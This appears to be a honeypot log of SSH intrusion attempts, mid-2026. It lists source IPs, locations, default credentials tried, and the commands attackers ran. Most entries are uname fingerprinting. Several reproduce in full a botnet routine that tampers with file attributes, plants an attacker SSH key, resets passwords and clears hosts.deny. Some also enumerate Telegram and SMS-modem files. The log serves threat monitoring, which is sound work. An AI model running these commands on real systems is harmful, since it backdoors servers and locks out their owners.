Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ hollow_harbor_root (42.200.66.164) โ€” South Wave Court, Hong Kong ยท 1 session ยท 2 cmds
2026-06-20 05:21 EDT ยท as oracle/oracle@2025
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ crimson_tuktuk_root (210.86.172.173) โ€” Bangkok, Thailand ยท 1 session ยท 1 cmd
2026-06-20 00:02 EDT ยท as root/password
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ ironclad_rogue_root (91.92.40.41) โ€” Varna, Bulgaria ยท 2 sessions ยท 2 cmds
2026-06-19 22:38 EDT ยท as oracle/1q2w3e4r5t, oracle/baseball
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—2
๐ŸŽญ ironclad_kopi_root (8.219.94.183) โ€” Singapore, Singapore ยท 3 sessions ยท 3 cmds
2026-06-19 17:23 EDT ยท as deploy/deploy123, root/root, user/password
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—3
๐ŸŽญ restless_panda_root_218 (115.191.33.218) โ€” Beijing, China ยท 1 session ยท 1 cmd
2026-06-19 21:03 EDT ยท as root/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ venomous_junk_root_74 (8.217.152.74) โ€” Hong Kong, Hong Kong ยท 1 session ยท 1 cmd
2026-06-19 19:18 EDT ยท as admin/admin
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ manic_silk_root_129 (123.56.83.129) โ€” Beijing, China ยท 1 session ยท 1 cmd
2026-06-19 18:42 EDT ยท as root/12345678
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ stoic_dutch_root (176.65.139.250) โ€” Eygelshoven, The Netherlands ยท 30 sessions ยท 30 cmds
2026-06-19 16:24 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 6x across 6 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—30
๐ŸŽญ cryptic_hawker_root (107.150.112.233) โ€” Singapore, Singapore ยท 1 session ยท 20 cmds
2026-06-19 17:04 EDT ยท as deploy/deploy123
chattr -ia .ssh lockr -ia .ssh โ†’ rm -rf .ssh && mkdir .ssh โ†’ echo ssh-rsa key โ†’ cat /proc/cpuinfo | grep name | wc -l โ†’ echo deploy123|passwd|bash โ†’ cat /proc/cpuinfo | grep model | wc -l โ†’ free -m | grep Mem โ†’ ls -lh $(which ls) โ†’
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "deploy123\n4Cp8qW93UiCD\n4Cp8qW93UiCD"|passwd|bash
$ Enter new UNIX password:
$ echo "deploy123\n4Cp8qW93UiCD\n4Cp8qW93UiCD\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ midnight_panda_root_34 (120.26.202.34) โ€” Hangzhou, China ยท 1 session ยท 1 cmd
2026-06-19 16:56 EDT ยท as root/password
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ nocturnal_clog_sol (91.92.42.147) โ€” Amsterdam, The Netherlands ยท 31 sessions ยท 31 cmds
2026-06-19 13:17 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—31
๐ŸŽญ cryptic_panda_root_107 (121.199.34.107) โ€” Hangzhou, China ยท 1 session ยท 1 cmd
2026-06-19 13:02 EDT ยท as postgres/postgres
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ feral_cipher_pi (20.105.65.67) โ€” Dublin, Ireland ยท 2 sessions ยท 2 cmds
2026-05-16 22:25 EDT ยท as pi/pi
Ran uname 2x across 2 sessions โ€” automated OS fingerprinting.
$ uname -a ร—2
โ†ณ OS/kernel identification
๐ŸŽญ haywire_rogue_root (91.92.40.45) โ€” Varna, Bulgaria ยท 27 sessions ยท 27 cmds
2026-06-19 06:08 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—27
๐ŸŽญ drowsy_roo_sol (134.199.168.153) โ€” Sydney, Australia ยท 3 sessions ยท 3 cmds
2026-06-19 06:38 EDT ยท as sol/123, sol/sol, solana/solana
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m ร—3
โ†ณ obfuscated system check
๐ŸŽญ derelict_moose_sol (147.182.154.147) โ€” Toronto, Canada ยท 1 session ยท 1 cmd
2026-06-19 06:44 EDT ยท as solana/solana
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m
โ†ณ obfuscated system check
๐ŸŽญ silent_autobahn_sol (139.59.140.48) โ€” Frankfurt am Main, Germany ยท 1 session ยท 1 cmd
2026-06-19 06:43 EDT ยท as validator/validator
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m
โ†ณ obfuscated system check
๐ŸŽญ aloof_scone_sol (68.183.35.1) โ€” Slough, United Kingdom ยท 3 sessions ยท 3 cmds
2026-06-19 06:25 EDT ยท as sol/sol, solana/solana, validator/validator
Ran uname 2x across 2 sessions โ€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m ร—3
โ†ณ obfuscated system check
๐ŸŽญ placid_tiger_crypto (206.189.131.101) โ€” Bengaluru, India ยท 1 session ยท 1 cmd
2026-06-19 06:30 EDT ยท as eth/eth
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m
โ†ณ obfuscated system check
๐ŸŽญ derelict_neon_root (101.36.124.127) โ€” Hong Kong, Hong Kong ยท 1 session ยท 2 cmds
2026-06-19 06:21 EDT ยท as oracle/Oracle2025
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ lurking_mekong_root (157.66.101.76) โ€” Quแบญn Bรฌnh Thแบกnh, Vietnam ยท 1 session ยท 2 cmds
2026-06-19 04:45 EDT ยท as oracle/oracle123#
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ weary_stein_root (207.154.250.9) โ€” Frankfurt am Main, Germany ยท 1 session ยท 20 cmds
2026-06-19 00:53 EDT ยท as admin/admin123
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "admin123\n9TkSuJmTLI93\n9TkSuJmTLI93"|passwd|bash
$ Enter new UNIX password:
$ echo "admin123\n9TkSuJmTLI93\n9TkSuJmTLI93\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ grumpy_seoul_root (121.141.243.81) โ€” Seoul, South Korea ยท 1 session ยท 9 cmds
2026-06-18 23:53 EDT ยท as root/root
/root/root login โ†’ /ip cloud print โ†’ ifconfig โ†’ uname -a โ†’ cat /proc/cpuinfo โ†’ ps | grep '[Mm]iner' โ†’ ps -ef | grep '[Mm]iner' โ†’ ls -la ~/.local/share/TelegramDesktop/tdata /home//.local/share/TelegramDesktop/tdata /dev/ttyGSM โ†’ locate D877F7
$ /ip cloud print
$ ifconfig
โ†ณ network mapping
$ uname -a
โ†ณ OS/kernel identification
$ cat /proc/cpuinfo
โ†ณ CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
๐ŸŽญ baroque_sakura_root_63 (133.18.122.63) โ€” Chiyoda City, Japan ยท 5 sessions ยท 5 cmds
2026-05-15 06:05 EDT ยท as admin/admin, admin/admin123, deploy/deploy123
Ran uname 4x across 4 sessions โ€” automated OS fingerprinting.
$ uname -a ร—5
โ†ณ OS/kernel identification
๐ŸŽญ vapor_pistachio_root (94.139.183.254) โ€” Tehran, Iran ยท 1 session ยท 1 cmd
2026-06-18 22:44 EDT ยท as root/123456
CPU profiling
$ echo "TEST"; echo -n "System :"; lsb_release -d | awk -F':' '{print " "$2}'; echo -n "Apt : "; which apt; echo -n "Cpu speed :"; cat /proc/cpuinfo | grep 'cpu MHz' | uniq | awk -F: '{printf " %.3f\n", $2}'; echo -n "Cpu count : "; nproc; echo -n "Memory : "; free -h | awk '/Mem:/ {print $2}'
โ†ณ CPU profiling
๐ŸŽญ derelict_komodo_root (36.95.194.50) โ€” South Tangerang, Indonesia ยท 1 session ยท 2 cmds
2026-06-18 19:53 EDT ยท as oracle/Welcome1
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ frantic_yankee_root (38.148.249.2) โ€” Los Angeles, United States ยท 1 session ยท 2 cmds
2026-06-18 19:07 EDT ยท as oracle/Welcome1
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ drowsy_acai_root (189.90.55.242) โ€” Florianรณpolis, Brazil ยท 1 session ยท 2 cmds
2026-06-18 18:21 EDT ยท as oracle/Password1
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ arctic_neon_root (47.86.3.155) โ€” Hong Kong, Hong Kong ยท 1 session ยท 1 cmd
2026-06-18 17:06 EDT ยท as pi/raspberry
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m
๐ŸŽญ feral_dragon_root_139 (47.110.137.139) โ€” Hangzhou, China ยท 1 session ยท 1 cmd
2026-06-18 16:05 EDT ยท as admin/admin
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ arctic_chateau_root (86.217.21.47) โ€” Avrillรฉ, France ยท 1 session ยท 2 cmds
2026-06-18 16:02 EDT ยท as oracle/test1234
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ scrappy_husk_root (91.92.40.31) โ€” Varna, Bulgaria ยท 27 sessions ยท 27 cmds
2026-06-18 13:06 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—27
๐ŸŽญ vapor_silk_root_19 (121.40.231.19) โ€” Hangzhou, China ยท 1 session ยท 1 cmd
2026-06-18 09:34 EDT ยท as deploy/deploy123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ baroque_junk_root (47.243.58.151) โ€” Hong Kong, Hong Kong ยท 9 sessions ยท 9 cmds
2026-06-17 23:46 EDT ยท as admin/123456, admin/password, oracle/oracle
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—9
๐ŸŽญ zealous_k-pop_root (121.183.240.55) โ€” Gongju, South Korea ยท 1 session ยท 9 cmds
2026-06-18 01:15 EDT ยท as root/root
SSH login as root โ†’ OS fingerprinting via uname -a โ†’ hardware profiling with /proc/cpuinfo โ†’ network interface audit via ifconfig โ†’ cryptominer detection attempts (ps grep) โ†’ Telegram data path enumeration โ†’ failed binary locate search โ†’ benign echo/cat output.
$ /ip cloud print
$ ifconfig
โ†ณ network mapping
$ uname -a
โ†ณ OS/kernel identification
$ cat /proc/cpuinfo
โ†ณ CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
๐ŸŽญ nocturnal_hawker_root (8.219.200.1) โ€” Singapore, Singapore ยท 8 sessions ยท 8 cmds
2026-06-17 20:26 EDT ยท as admin/123456, deploy/deploy123, oracle/password
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—8
๐ŸŽญ restless_tsar_root (85.30.212.24) โ€” Shchyolkovo, Russia ยท 1 session ยท 2 cmds
2026-06-18 00:17 EDT ยท as root/root
ip โ†’ network mapping
$ /ip cloud print
$ ifconfig
โ†ณ network mapping
๐ŸŽญ cryptic_tulip_root_181 (45.153.34.181) โ€” Eygelshoven, The Netherlands ยท 31 sessions ยท 31 cmds
2026-06-17 22:44 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 3x across 3 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—31
๐ŸŽญ silent_chai_root (103.89.136.111) โ€” Noida, India ยท 1 session ยท 2 cmds
2026-06-17 23:18 EDT ยท as oracle/Oracle@123
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ brazen_kimchi_root (14.55.144.22) โ€” Jeonju-si, South Korea ยท 1 session ยท 2 cmds
2026-06-17 23:08 EDT ยท as oracle/Oracle@123
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ savage_wok_root_191 (8.134.129.191) โ€” Guangzhou, China ยท 2 sessions ยท 2 cmds
2026-06-16 21:05 EDT ยท as admin/admin, user/user
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a ร—2
โ†ณ OS/kernel identification
๐ŸŽญ ashen_stroopwafel_sol (80.94.92.186) โ€” Amsterdam, The Netherlands ยท 80 sessions ยท 80 cmds
2026-05-11 04:38 EDT ยท as eth/eth, sol/123, sol/12345678
Ran uname 85x across 85 sessions โ€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m ร—80
โ†ณ obfuscated system check
๐ŸŽญ sullen_wok_pi (111.30.42.43) โ€” Youyilu, China ยท 1 session ยท 1 cmd
2026-06-17 21:11 EDT ยท as pi/raspberry
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ ironclad_silk_root_197 (118.196.104.197) โ€” Haidian, China ยท 1 session ยท 1 cmd
2026-06-17 21:06 EDT ยท as root/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ crimson_dimsum_root (152.32.239.122) โ€” Hong Kong, Hong Kong ยท 2 sessions ยท 39 cmds
2026-06-17 20:36 EDT ยท as deploy/deploy, root/root
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling โ†’ execute from /tmp โ†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l ร—2
โ†ณ CPU profiling
$ echo "root:IspYzWkwBbTb"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' ร—2
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' ร—2
$ ls -lh $(which ls) ร—2
$ which ls ร—2
$ crontab -l ร—2
โ†ณ persistence setup
$ w ร—2
โ†ณ logged-in users check
$ uname -m ร—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l ร—2
โ†ณ CPU profiling
$ top ร—2
โ†ณ process monitoring
$ uname ร—2
โ†ณ OS identification
$ uname -a ร—2
โ†ณ OS/kernel identification
$ whoami ร—2
โ†ณ privilege check
$ lscpu | grep Model ร—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' ร—2
$ echo -e "deploy\nwtyk1HynFfHf\nwtyk1HynFfHf"|passwd|bash
$ Enter new UNIX password:
$ echo "deploy\nwtyk1HynFfHf\nwtyk1HynFfHf\n"|passwd
๐ŸŽญ scrappy_frost_root (176.211.42.202) โ€” Vladivostok, Russia ยท 2 sessions ยท 39 cmds
2026-06-17 20:02 EDT ยท as deploy/deploy, root/root
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling โ†’ execute from /tmp โ†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
